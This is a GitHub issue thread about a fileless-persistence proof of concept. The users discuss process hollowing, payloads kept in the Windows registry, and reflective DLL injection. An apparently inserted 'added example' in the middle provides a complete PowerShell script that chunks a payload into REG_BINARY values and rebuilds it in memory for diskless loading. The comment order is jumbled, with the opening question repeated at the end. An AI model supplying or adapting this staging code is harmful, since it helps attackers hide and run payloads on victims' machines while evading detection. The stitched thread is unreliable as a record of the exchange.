Closed kiwids0220 closed 2 years ago
Hi, just further trying to understand your code. I think my question is: in order to load the actual payload, does the payload.exe have to be written to the disk first? Or how would you load it, as in the README: "The injector then proceeds to load the actual Payload.exe from its own executable resources. The payload is then injected using the process hollowing technique (RunPE)."
// Loads Payload.exe (native executable) from resources and injects into suitable OS executable.
I am just wondering how am I supposed to insert a payload into registry when it's way over the size limit?
This project is a PoC that incorporates several techniques to demonstrate fileless startup. Of course, a lot more techniques exist. If you require something special, such as a large file, you need to figure out an implementation, such as multiple REG_BINARY values, a download, etc. Not sure what the size limit is, though.
The technique used requires a first stage to be written in C#, because PowerShell is only capable of executing C# code, not native code. The second stage demonstrates native code execution, because many payloads are not written in C#. But you can also decide to only use C# and skip the last stage.
payload.exe has to be first written to the disk?
The whole purpose of this PoC is to have nothing written to the disk, executables and DLLs in particular. Once you touch the disk, the "game is over".
but what if I want to, let's say, download the bytes and inject them into the explorer.exe process [...] ?
If you want DLL injection without writing a DLL to disk, check out my other project r77 where I use reflective DLL injection. DLL injection becomes a hard task if you require it to happen in-memory, but it's entirely possible. My code is pretty clean and it should be easy to understand how it works and apply it in your own project.
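The "multiple REG_BINARY values" approach suggested above, worked through as an added example (this is not code from the project or its author): a PowerShell script that splits an arbitrary byte array into numbered REG_BINARY chunks under one key, records the chunk count and a SHA-256 digest alongside them, and reassembles the blob purely in memory with an integrity check before it is handed to a later stage. The key path `HKCU:\Software\FilelessDemo`, the `PartNNNN` naming scheme and the 64 KB chunk size are all assumptions chosen for illustration; the sample payload is constructed pseudo-random data, not a real executable.

```powershell
# Added example, not the project's own code. Stores a large blob as several
# REG_BINARY values and rebuilds it in memory with a SHA-256 integrity check.

$KeyPath   = 'HKCU:\Software\FilelessDemo'   # assumed, illustrative location
$ChunkSize = 64KB                            # assumed; keep well below the per-value limit of the target hive

function Get-Sha256Hex {
    param([Parameter(Mandatory)] [byte[]] $Bytes)
    $sha = [System.Security.Cryptography.SHA256]::Create()
    try { return [BitConverter]::ToString($sha.ComputeHash($Bytes)).Replace('-', '') }
    finally { $sha.Dispose() }
}

function Write-ChunkedBinary {
    param(
        [Parameter(Mandatory)] [byte[]] $Bytes,
        [Parameter(Mandatory)] [string] $Key,
        [int] $Chunk = $ChunkSize
    )
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    $count = [math]::Ceiling($Bytes.Length / $Chunk)
    for ($i = 0; $i -lt $count; $i++) {
        $start = $i * $Chunk
        $len   = [math]::Min($Chunk, $Bytes.Length - $start)
        $part  = New-Object byte[] $len
        [Array]::Copy($Bytes, $start, $part, 0, $len)
        # One REG_BINARY value per chunk: Part0000, Part0001, ...
        New-ItemProperty -Path $Key -Name ('Part{0:D4}' -f $i) -Value $part -PropertyType Binary -Force | Out-Null
    }
    # Chunk count and digest let the reader side verify the reassembly.
    New-ItemProperty -Path $Key -Name 'Count'  -Value $count -PropertyType DWord  -Force | Out-Null
    New-ItemProperty -Path $Key -Name 'Sha256' -Value (Get-Sha256Hex $Bytes) -PropertyType String -Force | Out-Null
    return $count
}

function Read-ChunkedBinary {
    param([Parameter(Mandatory)] [string] $Key)
    $item  = Get-ItemProperty -Path $Key
    $count = [int] $item.Count
    $ms = New-Object System.IO.MemoryStream
    for ($i = 0; $i -lt $count; $i++) {
        $name = 'Part{0:D4}' -f $i
        [byte[]] $part = $item.$name
        $ms.Write($part, 0, $part.Length)
    }
    $bytes = $ms.ToArray()
    # Refuse to hand a corrupted or tampered blob to the next stage.
    if ((Get-Sha256Hex $bytes) -ne $item.Sha256) {
        throw 'Reassembled blob does not match the stored SHA-256 digest'
    }
    return $bytes
}

# Constructed sample input: 300 KB of pseudo-random bytes standing in for a payload.
$sample = New-Object byte[] (300KB)
(New-Object System.Random 42).NextBytes($sample)

$written = Write-ChunkedBinary -Bytes $sample -Key $KeyPath
$back    = Read-ChunkedBinary -Key $KeyPath
'Wrote {0} chunks; reassembled {1} bytes; digest verified' -f $written, $back.Length

Remove-Item -Path $KeyPath -Recurse -Force   # clean up the demo key
```

The reassembled `$back` array is what a first stage would then load without touching disk, for instance by passing a .NET assembly's bytes to `[System.Reflection.Assembly]::Load`, which is the C#-in-PowerShell step the answer above describes. Whichever chunk size you pick, test it against the hive you actually target; the script stores the digest precisely so that a silently truncated or missing value is caught at read time rather than at execution time.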
I got it now. Thanks for the answer!
Hi. Nice code! But I am just wondering how I am supposed to insert a payload into the registry when it's way over the size limit? In the example I think you used MessageBoxA to call the native API. But what if I want to, let's say, download the bytes and inject them into the explorer.exe process, which means this might include multiple API calls? Please correct me if I am wrong on that. The only solution I can think of is to create more registry keys and store them separately?